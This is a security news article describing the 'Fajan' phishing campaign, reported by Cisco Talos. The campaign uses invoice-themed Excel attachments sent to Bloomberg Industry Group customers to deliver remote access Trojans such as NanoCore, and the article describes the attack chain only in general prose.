Hackers use email phishing campaign to deploy multiple variants of Trojans

A new phishing campaign targets specific targets by trying to distribute various remote access Trojan (RAT) variants. According to Cisco Talos Intelligence researchers, this hacking campaign was identified as “Fajan” and could be being operated from an Arabic-speaking country.

Experts believe this campaign would have started in early March, starting with a commitment to “low-profile” targets to determine whether malware samples were properly distributed or some debugging process was needed.

Attacks begin in the form of emails specifically addressed to Bloomberg Industry Group customers. This company adds news content on platforms for various industries, such as law, taxes and accounting, and government, and sells them to its various customers.

Attackers claim that these emails contain invoices, although they instead include Excel files with hidden code that initiates the download of a payload containing the RAT, based on JavaScript or VB: “This allows hackers to take control of the infected system using HTTP over a TCP port,” the security report mentions.

In addition, the use of RAT as payloads indicates that the goal of hackers is victim monitoring and data theft. However, the malicious C&C servers did not respond when the researchers did their analysis, so it was not possible to determine the actual targets of the threat actors.

One of the Trojans detected by specialists was identified as NanoCore RAT, and is a commercial Trojan that has been available for purchase since at least 2013. The author of this Trojan was arrested in 2017 and sentenced to three years in prison; although this disrupted the development of RAT, many similar variants continue to appear.

The same attack vector was found in approximately 60% of the campaigns analyzed. The rest of the malicious attachments contained Excel 4.0 macro formulas designed to run when the files are open and all contain simple code to run a PowerShell command line to download and run the next stage from a Pastebin URL.

Investigators will continue to analyze these incidents to try to determine the identity and objectives of the attackers. To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.